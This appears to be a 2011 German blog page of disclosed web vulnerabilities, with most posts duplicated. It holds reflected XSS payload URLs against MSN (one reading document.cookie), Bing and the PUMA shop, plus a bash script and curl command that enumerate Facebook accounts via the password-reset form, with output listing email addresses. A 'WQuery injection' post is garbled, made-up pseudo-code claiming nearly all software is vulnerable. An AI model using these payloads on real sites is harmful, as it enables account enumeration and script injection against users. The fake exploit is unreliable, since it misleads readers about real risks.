... neuere Einträge
Monday, 29. August 2011
MSN.com - XSS
Am Monday, 29. Aug 2011 im Topic 'Vulnerabilities'
XSS Vulnerability (Cross Site Scripting) in MSN.
Vulnerable Link:
http://glo.msn.com/search?searchTerm=%22%3E%3Cscript%3Ealert(document.cookie)%20;%3C/script%3E
by
TeamDX
Vulnerable Link:
http://glo.msn.com/search?searchTerm=%22%3E%3Cscript%3Ealert(document.cookie)%20;%3C/script%3E
by
TeamDX
Saturday, 27. August 2011
Telecom/Chat Servers <= 2.0.1 .1 Blind Exploitation
Am Saturday, 27. Aug 2011 im Topic 'Vulnerabilities'
using the WQuery injection attack:
WQuery........ ........ ($username)
$userdata = hub#;
if (isPasswordCorrect($username:Bg, $pass:M25)) {
$userdata = Bf%ByLogin($F20); ...
}
{
AS BEGIN
'SELECT:'string=B#(Var char 'FROM''$Status%'varchar(150) Brides'
WHERE 'FrIn'Lw =varchar(50) 'Millix*naire'
ph_status` varchar(20)=Count($Car) > $2000&+'
AND Hs_Status=='3#'
Brth_staus`Varchar(5)= Null;
AND Ss-status' =#Full$
{
$userselect=sxx(>20)
curl_setop="$ch(PRIMARY KEY ) (`dk-enter`)=’$fnm’
isGETCHA =$+`FInLawBal`
) TYPE`=MyFXX`;
}
Various Telecom/ISP servers are vulnerable to this attack.
Highly Vulnerable Softwares:
Pidgin
Meebo
MSN
AIM
Gtalk
Yahoo Messenger
Skype
Vypress
Windows Live Messenger
US Robotics
LG Electronics Routers
Intel Routers
Ericsson Routers
Cisco Routers
BT Telecoms
Win XP
Win Vista
Win Server 2008
Win 7
Win 2003
Firefox
Opera
IE all versions
Chrome Browser
by
FunnyMinds
WQuery........ ........ ($username)
$userdata = hub#;
if (isPasswordCorrect($username:Bg, $pass:M25)) {
$userdata = Bf%ByLogin($F20); ...
}
{
AS BEGIN
'SELECT:'string=B#(Var char 'FROM''$Status%'varchar(150) Brides'
WHERE 'FrIn'Lw =varchar(50) 'Millix*naire'
ph_status` varchar(20)=Count($Car) > $2000&+'
AND Hs_Status=='3#'
Brth_staus`Varchar(5)= Null;
AND Ss-status' =#Full$
{
$userselect=sxx(>20)
curl_setop="$ch(PRIMARY KEY ) (`dk-enter`)=’$fnm’
isGETCHA =$+`FInLawBal`
) TYPE`=MyFXX`;
}
Various Telecom/ISP servers are vulnerable to this attack.
Highly Vulnerable Softwares:
Pidgin
Meebo
MSN
AIM
Gtalk
Yahoo Messenger
Skype
Vypress
Windows Live Messenger
US Robotics
LG Electronics Routers
Intel Routers
Ericsson Routers
Cisco Routers
BT Telecoms
Win XP
Win Vista
Win Server 2008
Win 7
Win 2003
Firefox
Opera
IE all versions
Chrome Browser
by
FunnyMinds
Tuesday, 23. August 2011
BING.COM - XSS
Am Tuesday, 23. Aug 2011 im Topic 'Vulnerabilities'
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected
Description
------------------
BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.
Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read
Exploit example as follow
-----------------------------
http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW
The vulnerability is caused by the following code and affected by the
Generate Code map
by
runlvl
Vulnerability Type : XSS Reflected
Description
------------------
BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.
Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read
Exploit example as follow
-----------------------------
http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW
The vulnerability is caused by the following code and affected by the
Generate Code map
by
runlvl
Sunday, 21. August 2011
PUMA Online Shop - XSS
Am Sunday, 21. Aug 2011 im Topic 'Vulnerabilities'
http://www.shop.puma.com
Type: XSS
Exploitable:
hxxp://www.shop.puma.com/on/demandware.store/Sites-US-Site/en_US/Search-Show?q=alert(1)
Type: XSS
Exploitable:
hxxp://www.shop.puma.com/on/demandware.store/Sites-US-Site/en_US/Search-Show?q=alert(1)
Skype - HTML/Javascript Code Injection
Am Sunday, 21. Aug 2011 im Topic 'Vulnerabilities'
TotalShopUK 1.7.2 - SQL
Am Sunday, 21. Aug 2011 im Topic 'Vulnerabilities'
Wednesday, 3. August 2011
WordPress image utility - PHP Upload
Am Wednesday, 3. Aug 2011 im Topic 'Vulnerabilities'
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.
Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Facebook password recovery
Am Wednesday, 3. Aug 2011 im Topic 'Vulnerabilities'
Step by step:
- - Go to http://m.facebook.com
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.
Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.
Using cURL:
curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0
This process has no validation for external or forgery site/form.
Using the script:
#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done
#+----- EOF ------+
You can ennumerate users by using a list of email address or phone numbers.
$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO
by
Zerial
- - Go to http://m.facebook.com
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.
Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.
Using cURL:
curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0
This process has no validation for external or forgery site/form.
Using the script:
#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done
#+----- EOF ------+
You can ennumerate users by using a list of email address or phone numbers.
$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO
by
Zerial
Sunday, 31. July 2011
Skype (VoIP) - Denial of Service "DOS"
Am Sunday, 31. Jul 2011 im Topic 'Vulnerabilities'
Saturday, 30. July 2011
McDonalds.de - XSS
Am Saturday, 30. Jul 2011 im Topic 'Vulnerabilities'
... ältere Einträge